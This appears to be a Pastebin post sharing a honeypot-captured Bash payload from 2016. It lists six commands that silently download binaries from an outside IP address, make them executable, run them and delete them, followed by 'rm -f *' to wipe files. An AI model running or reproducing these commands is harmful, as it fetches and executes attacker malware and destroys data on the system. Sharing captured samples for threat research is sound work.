recon-scout

Honeypot Payload! Seen on: 2016-02-16 18:56

Feb 18th, 2016
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.41 KB | None | 0 0
  1. wget -q http://89.248.162.146/100; chmod +x 100; ./100; rm -f 100*
  2. wget -q http://89.248.162.146/200; chmod +x 200; ./200; rm -f 200*
  3. wget -q http://89.248.162.146/300; chmod +x 300; ./300; rm -f 300*
  4. wget -q http://89.248.162.146/400; chmod +x 400; ./400; rm -f 400*
  5. wget -q http://89.248.162.146/900; chmod +x 900; ./900; rm -f 900*
  6. wget -q http://89.248.162.146/1000; chmod +x 1000; ./1000; rm -f 1000*
  7. rm -f *
  8. exit
Add Comment
Please, Sign In to add comment